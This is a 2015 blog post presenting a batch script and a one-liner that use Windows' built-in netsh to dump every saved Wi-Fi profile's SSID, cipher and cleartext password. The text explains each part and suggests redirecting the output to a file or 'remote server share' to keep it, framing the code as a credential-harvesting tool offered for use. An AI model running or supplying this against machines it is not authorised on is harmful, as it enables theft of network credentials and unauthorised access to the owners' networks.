Monday, August 17, 2015

Dumping Wireless Passwords from Windows Machines (win7 & win8 tested; win10 not tested) using netsh

Here's how to dump all the wifi passwords from a windows machine using builtin tools:
Windows 7 - Tested Succesfully
Windows 8 - Tested Succesfully
Windows 10 - Not Tested

-=batch file=-
@echo off
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (
netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" echo.
)
pause > nul


How it works:
When doing a netsh wlan show profiles we get all the wireless profiles for the machine, but we also get a lot of other garbage that gets in the way. Piping it to find "Profile " cleans that up to only what we want. Notice the space after Profile in the find command. Then we can delimit on : and space character to get it down to just the wireless ssid's.

Now that we have just the ssid's, aka Profiles in netsh terms, we can query them to get various information from them, mostly we're just concerned with SSID, Cipher (encryption) and Key Content (the password). Using findstr we can search for multiple terms in one go, however the term Number of SSID's is also in the information so we use a find /v (do not match) to strip that out. Echo. inserts a blank line to keep things readable.

You'll likely want to put some redirects to save that to a text file, remote server share, something you can hold onto it with.

-=The one liner =-
I also wrote up a one liner to use in the event you can't run a batch file:

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

This one liner outputs nice clean output by first clearing the screen (cls), echoing a bank line (echo.), the running through the same script but keeping the echo feature off and then conveniently turning it back on at the end of the script.